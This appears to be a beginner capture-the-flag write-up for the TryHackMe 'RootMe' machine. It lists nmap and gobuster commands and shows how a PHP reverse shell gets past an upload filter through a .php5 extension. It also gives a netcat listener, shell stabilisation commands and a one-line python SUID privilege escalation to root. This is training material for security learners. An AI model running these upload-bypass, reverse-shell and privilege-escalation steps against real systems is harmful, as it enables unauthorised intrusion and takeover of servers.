🟢RootME

RootMe

A ctf for beginners, can you root me?

Questions

Scan the machine, how many ports are open?
What version of Apache are running?
What is the hidden directory?
user.txt?
Search for files with SUID permission, which file is weird?
root.txt?

Enumeration

Nmap

nmap -sSVC -A -O -vv

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9irIQxn1jiKNjwLFTFBitstKOcP7gYt7HQsk6kyRQJjlkhHYuIaLTtt1adsWWUhAlMGl+97TsNK93DijTFrjzz4iv1Zwpt2hhSPQG0GibavCBf5GVPb6TitSskqpgGmFAcvyEFv6fLBS7jUzbG50PDgXHPNIn2WUoa2tLPSr23Di3QO9miVT3+TqdvMiphYaz0RUAD/QMLdXipATI5DydoXhtymG7Nb11sVmgZ00DPK+XJ7WB++ndNdzLW9525v4wzkr1vsfUo9rTMo6D6ZeUF8MngQQx5u4pA230IIXMXoRMaWoUgCB6GENFUhzNrUfryL02/EMt5pgfj8G7ojx5
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERAcu0+Tsp5KwMXdhMWEbPcF5JrZzhDTVERXqFstm7WA/5+6JiNmLNSPrqTuMb2ZpJvtL9MPhhCEDu6KZ7q6rI=
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: HackIT - Home

Q: Scan the machine, how many ports are open?

A: 2

Q: What version of Apache are running?

A: 2.4.29

Q: What service is running on port 22?

A: ssh

finding Directories/files

gobuster dir -u http://10.10.63.255:80/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 33 -x html,php,txt

(the ip is different because I continued that writeup the other day)

Q: What is the hidden directory?

A: /panel/

checking the directory /panel/, we have

let's try to upload a shell

shell: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -o revs.php

remember to set a port to listening

nc -lvp PORT

"PHP isn't permitted"

let's try bypassing this using the ".php5" extension

mv revs.php revs.php5

it worked

to run click on "veja" ("see")

it worked, we have shell

to get a tty

python -c 'import pty;pty.spawn("/bin/bash")'

Ctrl+Z

stty raw -echo

fg

export TERM=xterm

user.txt

finding

find / -type f -name user.txt 2>/dev/null

getting

cat /var/www/user.txt

root.txt / Privilege Escalation

To look for the files with SUID permission we can use the command:

find / -type f -user root -perm -4000 2>/dev/null

Exploring python set uid capabilities

python -c "import os;os.setuid(0);os.system('/bin/bash')"

getting

PreviousTry Hack Me Write-ups NextPickle Rick

Last updated 4 years ago

hashtagRootMearrow-up-right

hashtag

hashtagQuestions

hashtagEnumeration

hashtagNmap

hashtagQ: Scan the machine, how many ports are open?

hashtagQ: What version of Apache are running?

hashtagQ: What service is running on port 22?

hashtagfinding Directories/files

hashtagQ: What is the hidden directory?

hashtaguser.txt

hashtagfinding

hashtaggetting

hashtagroot.txt / Privilege Escalation

hashtagExploring python set uid capabilities

hashtaggetting

RootMe

Questions

Enumeration

Nmap

Q: Scan the machine, how many ports are open?

Q: What version of Apache are running?

Q: What service is running on port 22?

finding Directories/files

Q: What is the hidden directory?

user.txt

finding

getting

root.txt / Privilege Escalation

Exploring python set uid capabilities

getting